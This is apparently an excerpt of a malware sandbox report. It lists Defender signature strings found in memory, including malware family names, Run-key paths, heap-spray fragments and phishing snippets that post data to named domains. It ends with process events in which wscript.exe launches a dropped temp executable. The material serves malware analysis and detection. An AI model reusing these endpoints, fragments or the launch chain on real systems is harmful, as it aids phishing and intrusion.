Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regedit.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regedit.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regjump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regjump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regsvcs.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regsvcs.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_replace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_replace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_rpcping.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_rpcping.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_runonce.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_runonce.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_sdelete.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_sdelete.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_streams.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_streams.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_svchost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_svchost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_taskmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_taskmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tcpvcon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tcpvcon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tracker.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tracker.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_usbinst.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_usbinst.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_winword.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_winword.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_wscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_wscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_xwizard.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_xwizard.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hstr:virtool:win32/obfuscator.pn!k3.0_%02x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +hstr:virtool:win32/obfuscator.pn!k3.0_%02x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 69d781ff29e39
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: systempathtodosname
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getsystemdriverpath
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readfilepointer16
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readfilepointer32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer16
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getlowestdevice32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getlowestdevice64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: multibytetochar
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \device
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ntsecuresys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ^%x%x%x%x%x%x%x%x%x%x%x%x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hsubkey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: syshost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \systemroot\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: kernel
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getmemoryasstring
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: bladabindi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: removerunningmalicious
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: removestartupmalicious
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcuregrun
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhklmregrun
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcudi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcusoft
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: curunkeyobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: curookkeyobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\software\microsoft\windows\currentversion\explorer\shell folders
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fhkcu\software\microsoft\windows\currentversion\explorer\shell folders
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: malwarenameb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ^%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: c^%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: maliciousvaluedata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" ..
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" ..
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\microsoft\windows\currentversion\run\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 5hklm\software\microsoft\windows\currentversion\run\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: blavaluedata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cudivalue
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusoftkeynameobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusoftnames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusubkeynames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\software\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: subsoftkey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: soctuseerincludesgenericrepairhelpers
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: browsermodifier:win32/soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: browsermodifier:win32/soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: system32\drivers
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.sys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.sys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 9hklm\software\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\wow6432node\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ehklm\software\wow6432node\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %ef@
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\system\currentcontrolset\services
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 'hklm\system\currentcontrolset\services
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enhances experience when browsing the web.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +enhances experience when browsing the web.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <k<zf
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <>wg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .z+an3:e!y
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: he731
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k! g@
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k%a+!*
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1;>sc;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 53b ca
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: --7?v
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e<s7d
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: o;<e7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cw<c5?u
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: )!gr]q
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dmns0
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 2]o\j 6e
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: mp+zyd
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 5ig-o
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 8cb58
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: u~ju;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ?ho5l
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fh~ek
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: }k"~b{gf&
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: =7]:`<[
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: n")[1].replace("debug-->","")))
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:codeonly.viewsure.j
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g.length;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +=1){
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ]=newarray((0x1000-0x20)/4);
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ][0]=0x666;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:html/phish.av23!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: url:'https://stretchbuilder.com/chalkzone/next.php',type:'post',data:
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: gurl:'https://stretchbuilder.com/chalkzone/next.php',type:'post',data:
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:html/phish.pdh8!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: url:'https://izmirdentalimplant.net/wp-content/themes/neve/next.php',
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: gurl:'https://izmirdentalimplant.net/wp-content/themes/neve/next.php',
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "target="https://vr2oq.csb.app/"targetmode="external

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582E0C4 AllocateAndInitializeSid,FreeSid,

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,

